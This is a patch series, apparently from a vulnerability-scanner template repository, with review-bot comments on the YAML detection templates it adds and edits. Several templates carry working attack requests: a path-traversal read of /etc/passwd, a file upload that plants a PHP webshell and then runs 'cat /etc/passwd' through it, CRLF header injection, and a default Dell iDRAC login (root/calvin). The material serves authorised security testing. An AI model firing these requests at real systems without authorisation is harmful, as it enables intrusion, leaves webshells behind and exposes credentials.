From: GitHub Action Date: Mon, 1 Mar 2021 10:40:16 +0000 Subject: [PATCH 138/370] Auto Update README [Mon Mar 1 10:40:16 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cbf05116f2..c26ff86f75 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 214 | vulnerabilities | 103 | exposed-panels | 87 | +| cves | 214 | vulnerabilities | 104 | exposed-panels | 87 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 15 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 641 files**. +**67 directories, 642 files**. From be87794843ee4d403924b4feba8bdf5f147818e5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:13:20 +0530 Subject: [PATCH 139/370] misc updates --- default-logins/dell/dell-idrac9-default-login.yaml | 3 +-- workflows/dell-idrac-workflow.yaml | 2 +- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 57d24e87da..6082707615 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -10,9 +10,8 @@ requests: cookie-reuse: true path: - "{{BaseURL}}/sysmgmt/2015/bmc/session" - body: " user=root&password=calvin" + body: "user=root&password=calvin" headers: - Host: "{{Hostname}}" Accept: "application/json, text/plain, */*" user: "root" password: "calvin" 
diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index 8ae4c19f84..e7385e0602 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -20,4 +20,4 @@ workflows: - template: technologies/dell/dell-idrac9-detect.yaml subtemplates: - - template: default-logins/dell/dell-idrac9-default-login.yaml + - template: default-logins/dell/dell-idrac9-default-login.yaml \ No newline at end of file From 58e03566e65d729057df8ff9c0d227129be904a6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 10:44:33 +0000 Subject: [PATCH 140/370] Create triconsole-xss.yaml --- vulnerabilities/other/triconsole-xss.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/triconsole-xss.yaml diff --git a/vulnerabilities/other/triconsole-xss.yaml b/vulnerabilities/other/triconsole-xss.yaml new file mode 100644 index 0000000000..9e987db15b --- /dev/null +++ b/vulnerabilities/other/triconsole-xss.yaml @@ -0,0 +1,25 @@ +id: triconsole-xss + +info: + name: Triconsole 3.75 XSS + author: pikpikcu + severity: medium + reference: https://cxsecurity.com/issue/WLB-2021020168 + tags: triconsole,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/calendar_form.php/">' + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From b472152f8fd0543da49e041dcf1947af99e5c310 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 10:44:47 +0000 Subject: [PATCH 141/370] Auto Update README [Mon Mar 1 10:44:47 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c26ff86f75..13fcd74097 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 214 | vulnerabilities | 104 | exposed-panels | 87 | -| exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 23 | miscellaneous | 16 | default-logins | 15 | +| exposures | 55 | technologies | 47 | misconfiguration | 49 | +| workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**67 directories, 642 files**. +**68 directories, 646 files**. From 88c371f1818bd256aa7f2eee00a272acd051b780 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 10:45:32 +0000 Subject: [PATCH 142/370] Update triconsole-xss.yaml --- vulnerabilities/other/triconsole-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/triconsole-xss.yaml b/vulnerabilities/other/triconsole-xss.yaml index 9e987db15b..bc5051fca6 100644 --- a/vulnerabilities/other/triconsole-xss.yaml +++ b/vulnerabilities/other/triconsole-xss.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium reference: https://cxsecurity.com/issue/WLB-2021020168 - tags: triconsole,lfi + tags: triconsole,xss requests: - method: GET From bd7f9de154d880e4dadf1c016cbd504a8b5ce011 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:35:54 +0530 Subject: [PATCH 143/370] misc workflow update --- workflows/cacti-workflow.yaml | 2 +- workflows/sap-netweaver-workflow.yaml | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/workflows/cacti-workflow.yaml b/workflows/cacti-workflow.yaml index a077a07ff6..8e2a673caf 100644 
--- a/workflows/cacti-workflow.yaml +++ b/workflows/cacti-workflow.yaml @@ -10,4 +10,4 @@ workflows: - template: technologies/cacti-detect.yaml subtemplates: - - template: vulnerabilities/other/cacti-file-write.yaml + - template: vulnerabilities/other/cacti-weathermap-file-write.yaml \ No newline at end of file diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index c2c4bf7ce8..ad21f93bdf 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml @@ -10,7 +10,6 @@ info: # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/sap-netweaver-as-java-detect.yaml subtemplates: - template: cves/2020/CVE-2020-6287.yaml From 780c343a95d0a85855217cccff2fcb1810c895ff Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:56:08 +0530 Subject: [PATCH 144/370] Add files via upload Jnoj Directory Traversal --- cves/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/CVE-2019-17538.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 0a768b9d954d47736e5d574b3888532151609857 Mon Sep 17 00:00:00 2001 
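Review bot: The raw GET in `CVE-2019-17538.yaml` has no `Host: {{Hostname}}` line, and whether nuclei fills it in for raw requests depends on the version, so on a virtual-hosted target this can land on the default site and miss; add `Host: {{Hostname}}` under the request line and drop the `Content-Type` header, which has no meaning on a body-less GET. The `info` block also has schema problems that make the template untaggable or unloadable: `tegs:` for `tags:`, `cve.cve2019` (a dot where the comma belongs, so `-tags cve2019` would not select it), `matchers-conditions:` for `matchers-condition:`, and `severity: High` instead of lowercase. The hard-coded `/jnoj/` prefix assumes a sub-directory install; if the application is also deployed at the site root, a second path entry without it would be needed.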
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:58:56 +0530 Subject: [PATCH 145/370] Delete CVE-2019-17538.yaml --- cves/CVE-2019-17538.yaml | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml deleted file mode 100644 index d42aa4f3eb..0000000000 --- a/cves/CVE-2019-17538.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-17538 -info: - name: Jnoj Directory Traversal for file reading(LFI) - author: pussycat0x - severity: High - reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms -requests: - - raw: - - | - GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - matchers-conditions: and - matchers: - - type : regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - From e281df8e1ffd972445bda94686bd585d51d26021 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:59:32 +0530 Subject: [PATCH 146/370] Add files via upload Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/2019/CVE-2019-17538.yaml diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/2019/CVE-2019-17538.yaml 
@@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 0e78ce0a5b261b7e106b40525e2b2afcab83a93e Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 11:40:03 +0000 Subject: [PATCH 147/370] Create simple-employee-rce.yaml --- .../other/simple-employee-rce.yaml | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 vulnerabilities/other/simple-employee-rce.yaml diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml new file mode 100644 index 0000000000..ea9315f3fe --- /dev/null +++ b/vulnerabilities/other/simple-employee-rce.yaml 
@@ -0,0 +1,53 @@ +id: simple-employee-rce + +info: + name: Simple Employee Records System 1.0 RCE + author: pikpikcu + severity: critical + reference: https://www.exploit-db.com/exploits/49596 + tags: employee,rce + +requests: + - raw: + - | + POST /dashboard/uploadID.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept: application/json, text/javascript, */*; q=0.01 + Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 + Accept-Encoding: deflate + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 + Content-Length: 267 + DNT: 1 + Connection: close + + -----------------------------5825462663702204104870787337 + Content-Disposition: form-data; name="employee_ID"; filename="poc.php" + Content-Type: image/png + + + -----------------------------5825462663702204104870787337-- + - | + GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 2 + + extractors: + - type: regex + name: endpoint + part: body + internal: true + regex: + - '(?:[a-zA-Z0-9+\/])*_poc.php' + + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + part: body From da44a0facec32ea6b52d0e2291631c09188a3151 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 11:46:14 +0000 Subject: [PATCH 148/370] Create CVE-2021-27330.yaml --- cves/2021/CVE-2021-27330.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2021/CVE-2021-27330.yaml diff --git a/cves/2021/CVE-2021-27330.yaml b/cves/2021/CVE-2021-27330.yaml new file mode 100644 index 0000000000..f51b0d1a6b --- /dev/null +++ b/cves/2021/CVE-2021-27330.yaml 
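Review bot: The first request uploads `poc.php` into `/uploads/employees_ids/` (its PHP payload is blank in this rendering, presumably stripped) and nothing removes it, so every scanned host is left with a webshell reachable at the extracted `{{endpoint}}`. Add a final request that uses the shell to delete itself (`cmd=rm%20-f%20{{endpoint}}`, with the path confirmed against where the upload actually lands) and move the `/etc/passwd` check into a `req-condition` matcher on the second response, or at least randomize the name and document the side effect in `info`. The hard-coded `Content-Length: 267` cannot stay correct once the payload is edited and `Content-Length: 2` on the body-less GET should go. `condition: and` on a single-entry `regex` list is a no-op.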
@@ -0,0 +1,25 @@ +id: CVE-2021-27330 + +info: + name: Triconsole 3.75 XSS + author: pikpikcu + severity: medium + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27330 + tags: cve,cve2021,triconsole,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/calendar_form.php/">' + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + condition: and + + - type: status + status: + - 200 From 821ed3db48ef301458a865e5523e46256c628e2c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 1 Mar 2021 11:46:43 +0000 Subject: [PATCH 149/370] Delete triconsole-xss.yaml --- vulnerabilities/other/triconsole-xss.yaml | 25 ----------------------- 1 file changed, 25 deletions(-) delete mode 100644 vulnerabilities/other/triconsole-xss.yaml diff --git a/vulnerabilities/other/triconsole-xss.yaml b/vulnerabilities/other/triconsole-xss.yaml deleted file mode 100644 index bc5051fca6..0000000000 --- a/vulnerabilities/other/triconsole-xss.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: triconsole-xss - -info: - name: Triconsole 3.75 XSS - author: pikpikcu - severity: medium - reference: https://cxsecurity.com/issue/WLB-2021020168 - tags: triconsole,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/calendar_form.php/">' - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - condition: and - - - type: status - status: - - 200 From 3a9f49972b4d40ee8be80cbd37dd85db9f0a1098 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:25:56 +0530 Subject: [PATCH 150/370] Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..669e23d523 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml 
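Review bot: As rendered here the only body matcher is `words: - ""`, an empty string, which matches every 200 response and would flag any host that serves `calendar_form.php`; the path payload after `calendar_form.php/">` is also blank, so both look like the `<script>…</script>` probe was stripped when this text was extracted. Please confirm the committed file carries the actual reflected string in both places, and add `text/html` in `part: header` so a payload reflected into a JSON or plain-text error page is not reported as XSS. `condition: and` on a single word is a no-op and can be dropped.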
@@ -4,7 +4,7 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tags: cve.cve2019,jnoj,cms requests: - raw: - | From 1c7cd8921ea49d5aeedaa4a29c7404e4b9aff25c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:26:36 +0530 Subject: [PATCH 151/370] syntax update --- cves/2019/CVE-2019-17538.yaml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..485a98cdef 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,18 +4,20 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tegs: cve.cve2019,jnoj,lfi + requests: - raw: - | GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 Content-Type: application/x-www-form-urlencoded - matchers-conditions: and + + matchers-condition: and matchers: - - type : regex - regex: - - "root:[x*]:0:0" - type: status status: - - 200 - + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From ff198c3ad920071e484439617ba7396ac162ae24 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:30:49 +0530 Subject: [PATCH 152/370] Update CVE-2019-17538.yaml --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 485a98cdef..8fd852fb23 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -2,7 +2,7 @@ id: CVE-2019-17538 info: name: Jnoj Directory Traversal for file reading(LFI) author: pussycat0x - severity: High + severity: high reference: https://github.com/shi-yang/jnoj/issues/53 tegs: cve.cve2019,jnoj,lfi 
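Review bot: This hunk is based on the original blob (`index d42aa4f3eb..485a98cdef`), not on the preceding commit's `tegs:` → `tags:` fix (`669e23d523`), so it reintroduces the misspelling — the context in the following commit shows `tegs: cve.cve2019,jnoj,lfi` is what ends up in the tree, leaving the template with no valid `tags` and a dot where the comma belongs. The line should read `tags: cve,cve2019,jnoj,lfi`. The `matchers-condition` and `part: body` corrections in this hunk are good.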
From b6ad95cbaa361d65af5ba66ae0f9defb92c833ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 12:06:59 +0000 Subject: [PATCH 153/370] Auto Update README [Mon Mar 1 12:06:59 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 13fcd74097..8c0042cef8 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 214 | vulnerabilities | 104 | exposed-panels | 87 | +| cves | 215 | vulnerabilities | 104 | exposed-panels | 87 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 646 files**. +**68 directories, 647 files**. From a07d7bca4e8224f0ab609f389395db6ad89e6c23 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Mar 2021 14:15:30 +0000 Subject: [PATCH 154/370] Create CVE-2021-27132.yaml --- cves/2021/CVE-2021-27132.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-27132.yaml diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml new file mode 100644 index 0000000000..bbe9fc4077 --- /dev/null +++ b/cves/2021/CVE-2021-27132.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2021-27132 + +info: + name: CRLF Injection - Sercomm VD625 + author: geeknik + severity: medium + description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header: https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + tags: cve,cve2021,crlf + +requests: + - method: GET + path: + - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" + + matchers-condition: and + matchers: + - type: status + status: + - 404 + part: header + + - type: word + words: + - "Content-Disposition: attachment;filename=test.txt" + - "Set-Cookie:CRLFInjection=Test" + - "Location: example.com" + - "X-XSS-Proection:0" + part: header + condition: and From 9a598c533577d6fdb773ba633912980cdd29e10d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Mar 2021 14:17:25 +0000 Subject: [PATCH 155/370] Update CVE-2021-27132.yaml --- cves/2021/CVE-2021-27132.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml index bbe9fc4077..0ae70321ea 100644 --- a/cves/2021/CVE-2021-27132.yaml +++ b/cves/2021/CVE-2021-27132.yaml @@ -1,10 +1,10 @@ id: CVE-2021-27132 info: - name: CRLF Injection - Sercomm VD625 + name: CRLF Injection - Sercomm VD625 author: geeknik severity: medium - description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header: https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 + description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 tags: cve,cve2021,crlf requests: From b303e7fac70c37f32ce13a60a213357e75d5b106 Mon Sep 17 00:00:00 2001 
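Review bot: The `description` value is a plain scalar containing `: ` (`... Content-Disposition header: https://...`), which most YAML parsers reject with a mapping-values error; quoting the scalar or replacing the colon fixes it, and [PATCH 155/370] below does the latter. Independently, the status matcher carries `part: header`, which has no effect on a status matcher (the code is read from the response status line, not from a part) and can be dropped. The last word, `X-XSS-Proection:0`, does not match the header the request injects (`X-XSS-Protection:0`), so with `condition: and` the template can never fire; [PATCH 165/370] further down corrects the spelling.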
From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:52:43 +0530 Subject: [PATCH 156/370] Create cisco-security-details.yaml --- exposed-panels/cisco-security-details.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/cisco-security-details.yaml diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml new file mode 100644 index 0000000000..560c8debcb --- /dev/null +++ b/exposed-panels/cisco-security-details.yaml @@ -0,0 +1,21 @@ +id: cisco-security-details + +info: + name: Cisco Meraki cloud & Security Appliance details + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6708 + +requests: + - method: GET + path: + - '{{BaseURL}}/#connection' + + matchers-condition: and + matchers: + - type: word + words: + - 'Your client connection' + - type: status + status: + - 200 From 4a5089879799da735658659210b448a470097cf5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:53:12 +0530 Subject: [PATCH 157/370] Create total-web.yaml --- exposed-panels/total-web.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/total-web.yaml diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml new file mode 100644 index 0000000000..e57c77187e --- /dev/null +++ b/exposed-panels/total-web.yaml @@ -0,0 +1,21 @@ +id: total-web-login + +info: + name: Total Web Solution + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6811 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Total Web Solutions' + - type: status + status: + - 200 From 7aed941d67799cf127027ac82d3c690152be6ab3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:55:34 +0530 Subject: [PATCH 158/370] Update total-web.yaml --- exposed-panels/total-web.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
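Review bot: The request path `'{{BaseURL}}/#connection'` contains a URL fragment, and a fragment is never transmitted to the server, so the template actually fetches `/` and reports any 200 front page that happens to contain `Your client connection`; the path should be written without `#`, or the matcher tightened to something specific to the Meraki status page. The same fragment pattern appears in `exposed-panels/acunetix-panel.yaml` ([PATCH 184/370], `{{BaseURL}}/#/login`). The `info` block has no `tags:` key, unlike the CVE templates in this series, so the template cannot be selected by tag; `tags: panel,cisco` would fit. The same omission is in total-web ([PATCH 157/370]), exposed-hg ([178]), hivemanager-login-panel ([179]), sphider-login ([181]), d-link-arbitary-fileread ([182]), acunetix-panel ([184]), checkmarx-panel ([185]), nessus-panel ([186]) and burp-api-detect ([187]).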
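Review bot: `id: total-web-login` does not match the file name `exposed-panels/total-web.yaml`; several templates in this series use the basename as `id` (`cisco-security-details`, `sphider-login`, `exposed-hg`) while others do not, so it is worth settling on one convention, and `total-web` for this file if the basename rule is the intended one. The `name` value `Total Web Solution ` ends in a trailing space that becomes part of the stored string; [PATCH 159/370] below strips it. The only content check is the word `Total Web Solutions` anywhere in the body of `/` combined with a 200, which is a weak signal for a panel detector; a second, product-specific word or a `part: header` check would reduce false positives.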
diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml index e57c77187e..5fd52916e7 100644 --- a/exposed-panels/total-web.yaml +++ b/exposed-panels/total-web.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 - + requests: - method: GET path: From f89245ca4a4c1b2033f351b9d757277bad0e1ecf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:55:51 +0530 Subject: [PATCH 159/370] Update total-web.yaml --- exposed-panels/total-web.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml index 5fd52916e7..3eb9c9200e 100644 --- a/exposed-panels/total-web.yaml +++ b/exposed-panels/total-web.yaml @@ -1,7 +1,7 @@ id: total-web-login info: - name: Total Web Solution + name: Total Web Solution author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 From 8e029c7d198ee1330bb022117a41fb113d9a17ea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 22:59:17 +0530 Subject: [PATCH 161/370] Update total-web.yaml --- exposed-panels/total-web.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/total-web.yaml b/exposed-panels/total-web.yaml index 3eb9c9200e..2515138891 100644 --- a/exposed-panels/total-web.yaml +++ b/exposed-panels/total-web.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6811 - + requests: - method: GET path: From b201743b2259d0a97f189a3585f4cb771c26ab20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 23:04:55 +0530 Subject: [PATCH 162/370] Update cisco-security-details.yaml --- exposed-panels/cisco-security-details.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml index 560c8debcb..80c033654d 100644 
--- a/exposed-panels/cisco-security-details.yaml +++ b/exposed-panels/cisco-security-details.yaml @@ -15,7 +15,7 @@ requests: matchers: - type: word words: - - 'Your client connection' +- 'Your client connection' - type: status status: - 200 From c568fbc7dc27822e631701230b2d4db6218850f0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Mar 2021 23:07:09 +0530 Subject: [PATCH 163/370] Update cisco-security-details.yaml --- exposed-panels/cisco-security-details.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cisco-security-details.yaml b/exposed-panels/cisco-security-details.yaml index 80c033654d..a6d57e0007 100644 --- a/exposed-panels/cisco-security-details.yaml +++ b/exposed-panels/cisco-security-details.yaml @@ -15,7 +15,7 @@ requests: matchers: - type: word words: -- 'Your client connection' + - 'Your client connection' - type: status status: - 200 From 3d331c7191056eb301c0681ae12866502ae1e2f3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Mar 2021 18:52:55 +0000 Subject: [PATCH 164/370] Auto Update README [Mon Mar 1 18:52:55 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8c0042cef8..be95c2aa0a 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 215 | vulnerabilities | 104 | exposed-panels | 87 | +| cves | 215 | vulnerabilities | 104 | exposed-panels | 89 | | exposures | 55 | technologies | 47 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 647 files**. +**68 directories, 649 files**. From 15f52ad5861867b0708b5722b3873d30c80b1645 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 1 Mar 2021 20:34:15 +0000 Subject: [PATCH 165/370] Update CVE-2021-27132.yaml omg typo --- cves/2021/CVE-2021-27132.yaml 